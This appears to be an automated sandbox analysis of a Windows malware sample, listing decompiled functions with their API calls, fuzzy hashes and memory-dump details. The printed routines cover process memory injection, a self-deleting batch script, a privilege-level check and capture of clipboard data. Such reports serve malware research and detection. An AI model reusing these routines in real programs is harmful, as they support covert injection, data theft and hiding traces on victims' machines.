    C-Code - Quality: 98%
    			E004051A9(WCHAR* __ecx, WCHAR* __edx, signed char* _a4) {
    				signed short _v80;
    				signed short _v260;
    				char _v914;
    				char _v1028;
    				char _v1292;
    				void* _v1812;
    				short _v1816;
    				char _v1820;
    				signed char* _v1824;
    				signed int _v1828;
    				char* _v1832;
    				void* _v1836;
    				intOrPtr _v1840;
    				intOrPtr _v1844;
    				char _v1848;
    				intOrPtr _v1852;
    				signed int _v1856;
    				signed int _v1860;
    				void* _v1861;
    				signed int _v1864;
    				void* __ebx;
    				void* __esi;
    				void* __ebp;
    				signed int _t60;
    				void* _t61;
    				signed int _t69;
    				signed int _t71;
    				signed int _t72;
    				signed int _t80;
    				signed int _t83;
    				long _t84;
    				long _t85;
    				signed int _t89;
    				signed int _t98;
    				signed int _t101;
    				signed int _t108;
    				signed int _t110;
    				WCHAR* _t123;
    				signed char _t125;
    				signed char* _t131;
    				signed int _t134;
    				void* _t136;
    				void* _t140;
    				signed int _t141;
    
    				_t129 = __edx;
    				_t128 = __ecx;
    				_t131 = _a4;
    				_t60 = E0040679A(__ecx, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
    				_v1860 = _t60;
    				if(_t60 != 0) {
    					_t61 =  *0x422e04; // 0x0
    					_v1836 = _t61;
    					_v1832 =  &_v1292;
    					_v1844 = E00405005;
    					_v1840 = E00405141;
    					_v1824 = _t131;
    					E00406A39( &_v1028);
    					E0041645D( &_v1292,  &_v914, 0x102);
    					_t69 =  *_t131 & 0x000000ff;
    					__eflags = _t69;
    					if(_t69 == 0) {
    						_t71 = _v80 >> 0x10;
    						__eflags = _t71;
    						_v1860 = _t71;
    						_t72 = _v80 & 0x0000ffff;
    						goto L7;
    					} else {
    						__eflags = _t69 == 1;
    						if(_t69 == 1) {
    							_v1860 = _v260 >> 0x10;
    							_t72 = _v260 & 0x0000ffff;
    							L7:
    							_v1856 = _t72;
    						}
    					}
    					_v1860 = _v1860 * 0xea60;
    					_v1856 = _v1856 * 0xea60;
    					E004164D4( &_v1028,  &_v1028, 0, 0x3fc);
    					_v1824 = 0;
    					_t80 = E004068C0();
    					__eflags = _t80;
    					if(_t80 != 0) {
    						do {
    							__eflags =  *_t131;
    							_v1861 = 1;
    							if( *_t131 != 0) {
    								L24:
    								_t83 = E00405B59();
    								_t138 = _t83;
    								__eflags = _t83;
    								if(__eflags == 0) {
    									goto L29;
    								} else {
    									_v1860 = E0041BF9B(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
    									E00416421(_t138);
    									__eflags = _v1864;
    									if(_v1864 == 0) {
    										_t131 = _a4;
    										goto L33;
    									} else {
    										_v1828 = _v1828 & 0;
    										_t108 = E00404DC9(_t128, _t129,  &_v1828, 1);
    										_t131 = _a4;
    										__eflags = _t108;
    										if(_t108 == 0) {
    											L33:
    											_t125 = _v1861;
    										} else {
    											_t131[8] = _t131[8] | 0xffffffff;
    											_t110 = E004055C6( &_v1848);
    											__eflags = _t110;
    											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
    											E0041C3C8( &(_t131[8]));
    											E00416421(_v1828);
    										}
    									}
    									E00416421(_v1848);
    									__eflags = _t125 - 2;
    									if(_t125 != 2) {
    										__eflags = _t125;
    										if(_t125 != 0) {
    											goto L29;
    										} else {
    											_t84 = _v1860;
    										}
    									} else {
    										_t84 = _v1856;
    									}
    								}
    							} else {
    								asm("sbb ebx, ebx");
    								_push(0);
    								E00404C88( !( ~(_v1812 & 0x0000ffff)) &  &_v1812);
    								_t123 =  &(_t131[0x122]);
    								_t89 = GetFileAttributesW( &_v1816);
    								__eflags = _t89 - 0xffffffff;
    								if(_t89 == 0xffffffff) {
    									_t89 = GetFileAttributesW(0x4223a8);
    									__eflags = _t89 - 0xffffffff;
    									if(_t89 == 0xffffffff) {
    										goto L29;
    									} else {
    										_t128 = 0x4223a8;
    										goto L14;
    									}
    								} else {
    									_t128 =  &_v1816;
    									L14:
    									_t129 = _t123;
    									E004167C2(_t89 | 0xffffffff, _t128, _t129);
    									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
    									__eflags = _t140 - 0xffffffff;
    									if(_t140 == 0xffffffff) {
    										L28:
    										E0041B785(_t123);
    										goto L29;
    									} else {
    										_v1828 = E0041B75E(_t128, _t140);
    										_t134 = _t129;
    										CloseHandle(_t140);
    										__eflags = _v1828 - 0xffffffff;
    										if(_v1828 != 0xffffffff) {
    											L17:
    											__eflags = _t134;
    											if(__eflags > 0) {
    												goto L28;
    											} else {
    												if(__eflags < 0) {
    													L20:
    													_t98 = lstrcmpiW(_t123,  &_v1816);
    													__eflags = _t98;
    													if(_t98 == 0) {
    														goto L24;
    													} else {
    														_t141 = E0040679A(_t128, 0x8793aef2, 2);
    														__eflags = _t141;
    														if(_t141 == 0) {
    															L29:
    															_t131 = _a4;
    															_t84 = 0x7530;
    														} else {
    															_t101 = MoveFileExW(_t123,  &_v1816, 0xb);
    															__eflags = _t101;
    															if(_t101 == 0) {
    																goto L29;
    															} else {
    																E00419BF4(_t141);
    																__eflags = _t101 | 0xffffffff;
    																_t128 =  &_v1820;
    																_t129 = _t123;
    																E004167C2(_t101 | 0xffffffff,  &_v1820, _t123);
    																goto L24;
    															}
    														}
    													}
    												} else {
    													__eflags = _v1824 - 0xffffffff;
    													if(_v1824 > 0xffffffff) {
    														goto L28;
    													} else {
    														goto L20;
    													}
    												}
    											}
    										} else {
    											__eflags = _t134;
    											if(_t134 == 0) {
    												goto L28;
    											} else {
    												goto L17;
    											}
    										}
    									}
    								}
    							}
    							_t85 = WaitForSingleObject( *0x422e04, _t84);
    							__eflags = _t85 - 0x102;
    						} while (_t85 == 0x102);
    					}
    					E00419BF4(_v1852);
    					_t136 = 0;
    				} else {
    					_t136 = 1;
    				}
    				E00416421(_t131);
    				return _t136;
    			}

    0x004051a9
    0x004051a9
    0x004051b8
    0x004051cc
    0x004051d1
    0x004051d7
    0x004051ed
    0x004051f2
    0x004051fd
    0x00405208
    0x00405210
    0x00405218
    0x0040521c
    0x00405236
    0x0040523e
    0x0040523e
    0x00405240
    0x00405264
    0x00405264
    0x00405267
    0x0040526b
    0x00000000
    0x00405242
    0x00405242
    0x00405243
    0x0040524f
    0x00405253
    0x00405273
    0x00405273
    0x00405273
    0x00405243
    0x00405281
    0x00405294
    0x004052a1
    0x004052a8
    0x004052ad
    0x004052b2
    0x004052b4
    0x004052ba
    0x004052ba
    0x004052bd
    0x004052c2
    0x004053c2
    0x004053c2
    0x004053c7
    0x004053c9
    0x004053cb
    0x00000000
    0x004053cd
    0x004053e0
    0x004053e4
    0x004053e9
    0x004053ed
    0x00405465
    0x00000000
    0x004053ef
    0x004053ef
    0x004053fa
    0x004053ff
    0x00405402
    0x00405404
    0x00405468
    0x00405468
    0x00405406
    0x00405409
    0x00405410
    0x00405415
    0x0040541c
    0x0040541f
    0x00405428
    0x00405428
    0x00405404
    0x00405470
    0x00405475
    0x00405478
    0x00405480
    0x00405482
    0x00000000
    0x00405484
    0x00405484
    0x00405484
    0x0040547a
    0x0040547a
    0x0040547a
    0x00405478
    0x004052c8
    0x004052cf
    0x004052d9
    0x004052db
    0x004052eb
    0x004052f1
    0x004052f3
    0x004052f6
    0x00405304
    0x00405306
    0x00405309
    0x00000000
    0x0040530f
    0x0040530f
    0x00000000
    0x0040530f
    0x004052f8
    0x004052f8
    0x00405311
    0x00405314
    0x00405316
    0x00405330
    0x00405332
    0x00405335
    0x0040542f
    0x00405430
    0x00000000
    0x0040533b
    0x00405342
    0x00405346
    0x00405348
    0x0040534e
    0x00405353
    0x0040535d
    0x0040535d
    0x0040535f
    0x00000000
    0x00405365
    0x00405365
    0x00405372
    0x00405378
    0x0040537e
    0x00405380
    0x00000000
    0x00405382
    0x0040538e
    0x00405390
    0x00405392
    0x00405435
    0x00405435
    0x00405438
    0x00405398
    0x004053a0
    0x004053a6
    0x004053a8
    0x00000000
    0x004053ae
    0x004053af
    0x004053b4
    0x004053b7
    0x004053bb
    0x004053bd
    0x00000000
    0x004053bd
    0x004053a8
    0x00405392
    0x00405367
    0x00405367
    0x0040536c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040536c
    0x00405365
    0x00405355
    0x00405355
    0x00405357
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405357
    0x00405353
    0x00405335
    0x004052f6
    0x00405444
    0x0040544a
    0x0040544a
    0x004052ba
    0x00405459
    0x0040545e
    0x004051d9
    0x004051db
    0x004051db
    0x004051dd
    0x004051ea

    APIs
      • Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB
    • GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000003FC,?,?,00000102), ref: 004052F1
    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0040532A
    • CloseHandle.KERNEL32(00000000,00000000), ref: 00405348
    • lstrcmpiW.KERNEL32(?,?), ref: 00405378
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
    • String ID:
    • API String ID: 503543330-0
    • Opcode ID: 367030b27542b8c9d3ce0f4dbea24886756557b1a3048dc74da039a791e27492
    • Instruction ID: a32b01b90f44adb92e35725f564f13d2e5ffac108e4c721b6bb1ab8da97a25ef
    • Opcode Fuzzy Hash: 367030b27542b8c9d3ce0f4dbea24886756557b1a3048dc74da039a791e27492
    • Instruction Fuzzy Hash: 0571D031504751ABC310EF748881BABB7E8EF81325F540A3EF994A72D1D738D9858B9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0041C9CD(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, char _a12, void* _a16, long _a20, void* _a24) {
    				int _v8;
    				void* _t37;
    				long _t38;
    				struct HBITMAP__* _t46;
    				void* _t47;
    				signed int _t56;
    				signed int _t57;
    				BITMAPINFO** _t62;
    				BITMAPINFO* _t64;
    
    				_t57 = __edx;
    				_v8 = 0;
    				_t64 = E004163F1(0x428);
    				if(_t64 == 0) {
    					L14:
    					if(_a24 != 0) {
    						DeleteObject(_a24);
    					}
    					L16:
    					return _v8;
    				}
    				_t64->bmiHeader = 0x28;
    				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
    					L13:
    					E00416421(_t64);
    					goto L14;
    				} else {
    					DeleteObject(_a24);
    					asm("cdq");
    					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
    					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
    					_a24 = 0;
    					_t64->bmiHeader.biHeight = _t56;
    					if(_t37 == 0) {
    						L7:
    						_t64->bmiHeader.biClrUsed = 0;
    						_push(8);
    						_t64->bmiHeader.biClrImportant = 0;
    						L8:
    						_pop(_t38);
    						_t64->bmiHeader.biBitCount = _t38;
    						L9:
    						_t62 = _a8;
    						asm("cdq");
    						_t58 = _t57 & 0x00000007;
    						asm("cdq");
    						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
    						_t64->bmiHeader.biCompression = 0;
    						if(_t62 != 0) {
    							 *_t62 = _t64;
    						}
    						_t21 =  &_a12; // 0x422e30
    						_t46 = CreateDIBSection(_a4, _t64, 0,  *_t21, _a16, _a20);
    						_v8 = _t46;
    						if(_t46 == 0 || _t62 == 0) {
    							goto L13;
    						} else {
    							goto L16;
    						}
    					}
    					_t47 = _t37 - 3;
    					if(_t47 == 0) {
    						goto L7;
    					}
    					if(_t47 != 0x14) {
    						goto L9;
    					}
    					_push(0x20);
    					goto L8;
    				}
    			}
    Instruction addresses (one per statement line of the listing above; 0x00000000 marks a synthesized jump):
    0x0041c9cd
    0x0041c9db
    0x0041c9e3
    0x0041c9e7
    0x0041caaf
    0x0041cab2
    0x0041cab7
    0x0041cab7
    0x0041cabd
    0x0041cac4
    0x0041cac4
    0x0041c9fc
    0x0041ca09
    0x0041caa9
    0x0041caaa
    0x00000000
    0x0041ca25
    0x0041ca28
    0x0041ca31
    0x0041ca3c
    0x0041ca3e
    0x0041ca3f
    0x0041ca42
    0x0041ca45
    0x0041ca55
    0x0041ca55
    0x0041ca58
    0x0041ca5a
    0x0041ca5d
    0x0041ca5d
    0x0041ca5e
    0x0041ca62
    0x0041ca6a
    0x0041ca70
    0x0041ca71
    0x0041ca79
    0x0041ca7e
    0x0041ca81
    0x0041ca86
    0x0041ca88
    0x0041ca88
    0x0041ca90
    0x0041ca98
    0x0041ca9e
    0x0041caa3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041caa3
    0x0041ca47
    0x0041ca4a
    0x00000000
    0x00000000
    0x0041ca4f
    0x00000000
    0x00000000
    0x0041ca51
    0x00000000
    0x0041ca51

    APIs
    • GetDIBits.GDI32(00000000,004081E0,00000000,00000001,00000000,00000000,00000000), ref: 0041CA05
    • GetDIBits.GDI32(00000000,004081E0,00000000,00000001,00000000,00000000,00000000), ref: 0041CA1B
    • DeleteObject.GDI32(004081E0), ref: 0041CA28
    • CreateDIBSection.GDI32(?,00000000,00000000,0.B,2937498D,?), ref: 0041CA98
    • DeleteObject.GDI32(004081E0), ref: 0041CAB7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: BitsDeleteObject$CreateSection
    • String ID: 0.B
    • API String ID: 1423349713-1224676626
    • Opcode ID: 639715c4878756bfe96e7fa8cf17fd2e0175b4d6f29cb4b924d04e7ec1c56fb9
    • Instruction ID: b42ac40a36f795f9dff124df8d01c0ea9757dfdb62c61a7e6df4d36206b13e72
    • Opcode Fuzzy Hash: 639715c4878756bfe96e7fa8cf17fd2e0175b4d6f29cb4b924d04e7ec1c56fb9
    • Instruction Fuzzy Hash: 7931C47650020EAFDF21CF65CD84AAB7BE9EF48380B04842EF945D6660C735DD918BA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E004067D5(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
    				char _v5;
    				void _v12;
    				intOrPtr _t25;
    				void _t26;
    				signed int _t29;
    				void _t43;
    				void* _t51;
    				void* _t52;
    
    				_t52 = __esi;
    				_t51 = __edi;
    				_t25 =  *0x422954; // 0x400000
    				_t26 = E0041AD83(_t25, __edi);
    				_v12 = _t26;
    				if(_t26 != 0) {
    					_v5 = 0;
    					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
    						_v5 = 1;
    					}
    					_t29 =  *0x422940; // 0x1
    					_a8 = _a8 | _t29 & 0x00000014;
    					_push(_t52);
    					if(WriteProcessMemory(_t51, 0x422940 -  *0x422954 + _v12,  &_a8, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(WriteProcessMemory(_t51, 0x422954 -  *0x422954 + _v12,  &_v12, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E00405FB6(0x422e04, _t51, _v12,  *0x422e04) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E00405FB6(0x422e08, _t51, _v12,  *0x422e08) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(_v5 == 0) {
    						_t43 = _v12;
    					} else {
    						VirtualFreeEx(_t51, _v12, 0, 0x8000);
    						goto L1;
    					}
    				} else {
    					L1:
    					_t43 = 0;
    				}
    				return _t43;
    			}
    Instruction addresses (one per statement line of the listing above; 0x00000000 marks a synthesized jump):
    0x004067d5
    0x004067d5
    0x004067da
    0x004067e1
    0x004067e8
    0x004067ed
    0x00406802
    0x0040680f
    0x00406811
    0x00406811
    0x00406815
    0x0040681d
    0x00406820
    0x00406842
    0x00406844
    0x00406844
    0x00406863
    0x00406865
    0x00406865
    0x0040687e
    0x00406880
    0x00406880
    0x00406899
    0x0040689b
    0x0040689b
    0x004068a1
    0x004068b8
    0x004068a3
    0x004068ad
    0x00000000
    0x004068ad
    0x004067ef
    0x004067ef
    0x004067ef
    0x004067ef
    0x004068bd

    APIs
      • Part of subcall function 0041AD83: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000), ref: 0041AD9F
    • DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,0041CB3C,?,00000000,?), ref: 00406807
    • WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,0041CB3C,?,00000000,?,?,0041CCD4,?), ref: 0040683E
    • WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,0041CB3C,?,00000000,?,?,0041CCD4,?,?), ref: 0040685E
    • VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,0041CB3C,?,00000000,?,?,0041CCD4), ref: 004068AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
    • String ID: @)B$T)B
    • API String ID: 2215616122-1132917890
    • Opcode ID: 2844352ae7626de951a974667d5cb241385153f09ea5e6b57b1b1606b124fe24
    • Instruction ID: 4f4669f9f7885b1cf8020ccc2438eca68b6717a1d72e095b9ab52619e4d26b93
    • Opcode Fuzzy Hash: 2844352ae7626de951a974667d5cb241385153f09ea5e6b57b1b1606b124fe24
    • Instruction Fuzzy Hash: B021D6B2605149BADB05DBA4DE80EBF7F7CEB49348F4080B5F901F2190D3799A569B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00417EE1(void* __ebx, void* __edi, char _a4) {
    				short _v24;
    				intOrPtr _v28;
    				char _v72;
    				short _v592;
    				char _v852;
    				char _v1392;
    				void* _t35;
    				char _t56;
    
    				if(E0041B7A6(L"bat",  &_v592) == 0) {
    					L7:
    					return 0;
    				}
    				CharToOemW( &_v592,  &_v852);
    				_push( &_v852);
    				if(E004171E5( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
    					L6:
    					E0041B785( &_v592);
    					goto L7;
    				}
    				_t35 = E0041B5DA( &_v592, _a4, _t31);
    				E00416421(_a4);
    				if(_t35 == 0) {
    					goto L6;
    				}
    				_push(__edi);
    				_push( &_v592);
    				if(E00417114( &_v592, 0x10e,  &_v1392,  &M00404A0C) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
    					goto L6;
    				} else {
    					_t56 = 0x44;
    					E004164D4( &_v72,  &_v72, 0, _t56);
    					_v24 = 0;
    					_v72 = _t56;
    					_v28 = 1;
    					return E00417CE8( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
    				}
    			}
    Instruction addresses (one per statement line of the listing above; 0x00000000 marks a synthesized jump):
    0x00417efd
    0x00417fef
    0x00000000
    0x00417fef
    0x00417f11
    0x00417f1d
    0x00417f35
    0x00417fe3
    0x00417fea
    0x00000000
    0x00417fea
    0x00417f47
    0x00417f51
    0x00417f59
    0x00000000
    0x00000000
    0x00417f5f
    0x00417f66
    0x00417f82
    0x00000000
    0x00417fa3
    0x00417fa5
    0x00417fad
    0x00417fb5
    0x00417fcd
    0x00417fd0
    0x00000000
    0x00417fde

    APIs
      • Part of subcall function 0041B7A6: GetTempPathW.KERNEL32(000000F6,?), ref: 0041B7BD
    • CharToOemW.USER32 ref: 00417F11
      • Part of subcall function 0041B5DA: CreateFileW.KERNEL32(00417EFB,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B5F4
      • Part of subcall function 0041B5DA: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B617
      • Part of subcall function 0041B5DA: CloseHandle.KERNEL32(00000000,?,0041B819,00417EFB,00000000,00000000,00417EFB,?), ref: 0041B624
      • Part of subcall function 00416421: HeapFree.KERNEL32(00000000,00000000,00417C18,00000000,?,?,?,004060A9,00000000,00406583), ref: 00416434
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00417F95
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
    • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
    • API String ID: 1639923935-3344086482
    • Opcode ID: 004ba48598160e4ac23387e20f8d9040b2b3c6233c20d5384048c89fa89ca8dd
    • Instruction ID: d2527249bbee34bb5c6be1fa124756877380e8bd3387bb81f4f3decc171b221b
    • Opcode Fuzzy Hash: 004ba48598160e4ac23387e20f8d9040b2b3c6233c20d5384048c89fa89ca8dd
    • Instruction Fuzzy Hash: 992171B19451086ADB10DBA5DC46FEF77BCEF44314F204167F608E2191EA789BC68B68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00417B75(void* __ecx) {
    				long _v8;
    				void* _v12;
    				char* _t21;
    				signed char _t22;
    				DWORD* _t25;
    				void* _t32;
    
    				_t28 = 0;
    				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
    					L14:
    					return _t28;
    				}
    				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L13:
    					CloseHandle(_v12);
    					goto L14;
    				} else {
    					_t32 = E004163F1(_v8);
    					if(_t32 == 0) {
    						L12:
    						goto L13;
    					}
    					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
    						_t21 = GetSidSubAuthorityCount( *_t32);
    						if(_t21 != 0) {
    							_t22 =  *_t21;
    							if(_t22 > 0) {
    								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
    								if(_t25 != 0) {
    									if( *_t25 >= 0x2000) {
    										asm("sbb bl, bl");
    										_t28 = 3;
    									} else {
    										_t28 = 1;
    									}
    								}
    							}
    						}
    					}
    					E00416421(_t32);
    					goto L12;
    				}
    			}
    Instruction addresses (one per statement line of the listing above; 0x00000000 marks a synthesized jump):
    0x00417b83
    0x00417b8d
    0x00417c23
    0x00417c27
    0x00417c27
    0x00417ba9
    0x00417c19
    0x00417c1c
    0x00000000
    0x00417bb6
    0x00417bbf
    0x00417bc3
    0x00417c18
    0x00000000
    0x00417c18
    0x00417bd6
    0x00417bda
    0x00417be2
    0x00417be4
    0x00417be8
    0x00417bf1
    0x00417bf9
    0x00417c02
    0x00417c0d
    0x00417c0f
    0x00417c04
    0x00417c04
    0x00417c04
    0x00417c02
    0x00417bf9
    0x00417be8
    0x00417be2
    0x00417c13
    0x00000000
    0x00417c13

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417B85
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BA5
    • GetLastError.KERNEL32(?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BAB
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BD2
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BDA
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417BF1
    • CloseHandle.KERNEL32(?,?,?,?,004060A9,00000000,00406583,?,?,00000000), ref: 00417C1C
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
    • String ID:
    • API String ID: 3714493844-0
    • Opcode ID: bce2b1f989a1d21d6e703f37d3047af5bc0e565e9cf843ffb1f5230efbe2075c
    • Instruction ID: e2cdd288235fb1fe3f4f6663042c3c76a219e2f521f445cde77449fcbae1e455
    • Opcode Fuzzy Hash: bce2b1f989a1d21d6e703f37d3047af5bc0e565e9cf843ffb1f5230efbe2075c
    • Instruction Fuzzy Hash: C911B175604048EFEB105B90DD84EEE3BBEEB05390F100876F640E6160E7358EC5A7A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E004162F5(void* _a4) {
    				signed int _t11;
    				void* _t21;
    				void* _t23;
    				void* _t24;
    				int _t25;
    
    				_t25 = _a4;
    				_t23 = GetClipboardData(_t25);
    				_a4 = _t23;
    				if(E004068C0() == 0) {
    					return _t23;
    				}
    				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
    					L20:
    					return _a4;
    				} else {
    					_t21 = GlobalLock(_t23);
    					if(_t21 == 0) {
    						L19:
    						goto L20;
    					}
    					_t11 = _t25 - 1;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(0);
    						L12:
    						_t24 = E00416661(_t11 | 0xffffffff);
    						L15:
    						if(_t24 != 0) {
    							EnterCriticalSection(0x423148);
    							E00415FF2(0x4048b0);
    							E00415FF2(_t24);
    							LeaveCriticalSection(0x423148);
    							if(_t24 != _t21) {
    								E00416421(_t24);
    							}
    						}
    						GlobalUnlock(_a4);
    						goto L19;
    					}
    					_t11 = _t11 - 6;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(1);
    						goto L12;
    					}
    					if(_t11 != 6) {
    						_t24 = _a4;
    					} else {
    						_t24 = _t21;
    					}
    					goto L15;
    				}
    			}
    Instruction addresses (one per statement line of the listing above; 0x00000000 marks a synthesized jump):
    0x004162f9
    0x00416304
    0x00416306
    0x00416310
    0x00000000
    0x00416312
    0x0041631b
    0x004163a3
    0x00000000
    0x00416330
    0x00416338
    0x0041633c
    0x004163a2
    0x00000000
    0x004163a2
    0x00416340
    0x00416341
    0x00416360
    0x00416361
    0x00416354
    0x0041635c
    0x00416368
    0x0041636a
    0x00416372
    0x0041637d
    0x00416383
    0x00416389
    0x00416391
    0x00416394
    0x00416394
    0x00416391
    0x0041639c
    0x00000000
    0x0041639c
    0x00416343
    0x00416346
    0x00416351
    0x00416352
    0x00000000
    0x00416352
    0x0041634b
    0x00416365
    0x0041634d
    0x0041634d
    0x0041634d
    0x00000000
    0x0041634b

    APIs
    • GetClipboardData.USER32 ref: 004162FE
      • Part of subcall function 004068C0: WaitForSingleObject.KERNEL32(00000000,0041D437), ref: 004068C8
    • GlobalLock.KERNEL32 ref: 00416332
    • EnterCriticalSection.KERNEL32(00423148,00000000,00000000), ref: 00416372
    • LeaveCriticalSection.KERNEL32(00423148,00000000,004048B0), ref: 00416389
    • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0041639C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
    • String ID: H1B
    • API String ID: 1109978993-3745981028
    • Opcode ID: 8925f79ae8d16de863e2a3d3bb42d82ef38032500c08bad59b2523f3f44fc476
    • Instruction ID: 6e03cb95158d279f861de92ac889b245dd150b0da374fe5ec4618d5a8931013f
    • Opcode Fuzzy Hash: 8925f79ae8d16de863e2a3d3bb42d82ef38032500c08bad59b2523f3f44fc476
